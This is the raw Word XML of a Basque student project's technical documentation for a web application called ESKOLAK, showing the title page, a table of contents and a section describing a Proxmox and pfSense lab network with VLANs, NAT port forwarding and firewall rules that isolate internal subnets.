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33D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="700" w:after="120" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2148840" cy="214884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3B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:after="75"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>ESKOLAK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="4F81BD"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="4F81BD"/>
        </w:rPr>
        <w:t>Web Aplikazioaren Dokumentazio Teknikoa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450"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="595959"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t>Erronka 1 · Talde 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="0" w:after="285"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="0" w:after="285"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Aurkibidea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Sarea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333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Sistemak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Proiektuaren aurkezpena eta helburuak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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1.1. Helburu nagusiak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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1.2. Aplikazioaren fitxa teknikoa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Erabilitako teknologiak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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2.1. Backend-a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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2.2. Frontend-a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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2.3. Garapen- eta kalitate-tresnak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Arkitektura, egitura eta azpiegitura</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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3.1. Proiektuaren egitura eta direktorioak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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3.2. MVC fluxuaren adibidea</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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3.3. Azpiegitura eta hedapena Proxmox ingurunean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Erabiltzaile motak eta baimen-sistema</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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4.1. Erabiltzaile-rolak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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4.2. Gate bidezko baimen-sistema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Funtzionalitate nagusiak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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5.1. Erregistroa eta kontuaren egiaztapena</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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5.2. Saioa hasi eta Google bidezko sarbidea (OAuth)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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5.3. Profil akademikoa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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5.4. Ikastaroen katalogoa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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5.5. Matrikulazioak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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5.6. Irakasle-gunea</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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5.7. Administrazio-panela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Datu-basearen diseinua</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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6.1. Taula nagusiak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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6.2. Ereduen arteko erlazio logikoa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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6.3. Datuen osotasunerako mekanismoak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Ibilbide eta kontrolatzaile nagusiak (Routing)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Segurtasun-neurriak eta protokoloak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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8.1. Babes-mekanismo orokorrak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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8.2. Administratzaile bakarra ez galtzeko babesa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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8.3. Produkzioko segurtasun-gomendioak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Pentesting simulazioa eta ahultasunen azterketa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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9.1. Metodologia eta azterketa-ingurunea</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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9.2. Simulatutako eraso-kasuak (OWASP Top 10)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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9.3. Emaitzak eta aplikatutako a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>rintze-neurriak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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9.4. Laborategiko pentesting praktika eta analisi forensea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Prebentzio-plana eta enpresaren kontzientziazioa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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lastRenderedPageBreak/>
        <w:t>10.1. Helburu tekniko zein antolakuntzazkoak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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10.2. Prestakuntza-ekintzak eta ohitura seguruak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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10.3. Phishing simulazioak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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10.4. Pasahitzen politika eta MFA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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10.5. Intzidenteen komunikazio-protokoloa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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10.6. Plangintza eta maiztasun-matrizea</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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10.7. Planaren jarraipena eta ebaluazioa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Arriskuen analisia eta arrisku-taula</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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11.1. Arriskuen ebaluazio-matrizea</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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11.2. Arrisku-mailen interpretazioa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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11.3. Arrisku nagusien tratamendua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Hizkuntzak eta erabilerraztasuna</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660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12.1. Nazioartekotzea (i18n) eta hizkuntza-kudeaketa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660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12.2. Tema argia / iluna eta UI erabilerraztasuna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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> ingurune-konfigurazioa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Instalazioa eta exekuzio-gida</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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14.1. Urratsak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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14.2. Komando erabilgarriak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Probak, kalitatea eta CI/CD pipeline-a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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15.1. GitHub Actions CI prozesua</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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15.2. Probetan agertzen diren arlo nagusiak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Proiektuaren egungo egoera eta hobekuntza-proposamenak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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16.1. Antzemandako dokumentazio-oharra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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16.2. Hobekuntza posibleak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Ondorioak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Eranskina A · Osagai nagusien laburpena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Eranskina B · Pentesting auditoretzaren txostena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Eranskina C · Pentesting faseak eta tresnak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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Eranskina D · Auzitegi analisiaren txantiloiak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="450"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pP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450"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="450" w:after="285"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1.SAREAK </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="240" w:after="240" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Proxmox VE (9.2.2 bertsioa) instalatu dugu 192.168.74.70/24 sarean, ingurune birtualizatuan pfSense suebakia eta azpisare ezberdinen arteko segmentazioa eta bideratzea konfiguratu dira, segurtasuna eta isolamendua bermatzeko.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="240" w:after="24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SARE BIRTUALAREN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ARKITEKTURA ETA VLAN-AK </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pP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1383"/>
        <w:gridCol w:w="1948"/>
        <w:gridCol w:w="1893"/>
        <w:gridCol w:w="2031"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:trHeight w:val="1095"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="176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rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>VLAN / Sarea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="138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rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Proxmox Interfazea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="194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rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">pfSense Interfazea </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="189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rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Atebide Nagusia (Gateway)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="203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rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Zerbitzuak / Makina Birtualak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:trHeight w:val="1395"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="176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rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>(WAN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="138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t>vmbr1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="194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t xml:space="preserve">vtnet0 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="189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t>192.168.74.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="203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t>pfSense WAN Interfazea (192.168.74.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:trHeight w:val="1395"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="176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rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>DMZ (VLAN 10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="138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  <w:rPr>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>vmbr2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="194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t xml:space="preserve">vtnet1 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="189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t>192.168.10.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="203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t>VM 104 (ubuntu-web) (192.168.10.10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:trHeight w:val="1395"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="176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rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Zerbitzariak (VLAN 20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="138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t>vmbr3 (Tag 20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="194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t xml:space="preserve">vtnet2-lan </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="189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t>192.168.20.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="203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t>VM 103 (ubuntu-mysql) (192.168.20.10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:trHeight w:val="1125"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="176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rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Erabiltzaileak (VLAN 30)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="138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t>vmbr3 (Tag 30)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="194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t xml:space="preserve">vtnet2-lan </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="189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t>192.168.30.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="203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t>VM 102 (bezero) (192.168.30.100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:trHeight w:val="1395"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="176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rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Sistemak (VLAN 40)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="138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t>vmbr3 (Tag 40)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="194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t xml:space="preserve">vtnet2-lan </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="189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t>192.168.40.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="203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0233D" w:rsidRDefault="003B1660">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="480" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>VM 101 (Active Directory) (192.168.40.10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">vmbr1(WAN) → Klaseko/kanpoko sarearekin konektatzeko erabilitako interfazea </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
        </w:rPr>
        <w:t>vmbr2(DMZ) → Web zerbitzaria isolatzeko eremu birtuala</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
        </w:rPr>
        <w:t>vmbr3 (LAN VLANS) → Interfaze honen gainean bideratzen dira VLAN-ak (20,30,40) azpisareak tag-en bidez</w:t>
      </w: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</w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1308100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</w:pPr>
      <w:r>
        <w:t>ISO-ak igo genituen</w:t>
      </w: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</w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="11430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</w:pPr>
      <w:r>
        <w:t>Pfsense instalatu 192.168.74.71 sarean eta sare txartelak jarri genion</w:t>
      </w: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</w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2171700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</w:pPr>
      <w:r>
        <w:t>Vlan-ak eta Interfazeak jarri</w:t>
      </w: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</w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="21717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3B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1536700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</w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bideratze NAT </w:t>
      </w:r>
      <w:r>
        <w:t>eta Segurtasun Arauak</w:t>
      </w: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</w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2286000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3B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Wan-etik sartzen den trafiko guztia PfSensera ailegatzean berbideratzen dio web zerbitzarira, hau da, PfSensearen IP-a jartzen baduzu berbideratuko dio webaraino</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP (80 portua):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAN IP-ra datorren 80 portuko trafikoa 192.168.10.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0 IPra (80 portura) berbideratzen da. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTPS (443 portua):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAN IP-ra datorren 443 portuko trafikoa 192.168.10.10 IPra (443 portura) berbideratzen da. </w:t>
      </w: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DMZ interfazearen segurtasun arauak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="21590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3B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.Permit TCP 3306 (DMZ </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>→</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> MySQL) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DMZtik trafikoa baimentzen du 3306 portuan web-a datu basearekin komunikatzeko</w:t>
      </w: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</w:pPr>
      <w:r>
        <w:t>2. Barne sareen blokeoa (192.168.20.0/24,192.168.30.0/24,192.168.40.0/24)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Barneko sareen trafikoa blokeatzen du segurtasuna bermatzeko, hau da, hacker batek web-a erasotzen bad</w:t>
      </w:r>
      <w:r>
        <w:t>u ezingo du beste sareetara salto egin</w:t>
      </w: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</w:pPr>
      <w:r>
        <w:t>3. Trafiko guztia baimentzen du kanpo nabigazioa izateko</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pP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Erabiltzaileen interfazearen segurtasun arauak</w:t>
      </w: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</w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="26289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3B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>1. Erabiltzaileei pfSense-ren kudeaketa-panelera atzipena baimentzen du 80 (HTTP) eta 443 (HTTPS) portutik</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Zerbitzariarekin komunikazioa baimentzen du, erabiltzaileek autentifikatu eta GPOak jaso ahal izateko </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>3. (kaptura berria atera txarto dago)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>4 eta 5. Zerbitzari eta Sistemetako sarera atzitu nahi badu erabiltzaile batek, ez dio lagako</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">6. Filtro guztiak </w:t>
      </w:r>
      <w:r>
        <w:t>aplikatu eta gero sarera atzipena izango du</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pP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Outbound NAT </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modua: Automatic Outbound NAT kudeaketa automatikoa erabili da </w:t>
      </w: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</w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2768600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3B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Sare lokaleko (192.168.10.0/24, 20.0/24, 30.0/24, 40.0/24) paketeak kanpora doazenean, jatorrizko IP helbide pribatua pfSense-ren</w:t>
      </w:r>
      <w:r>
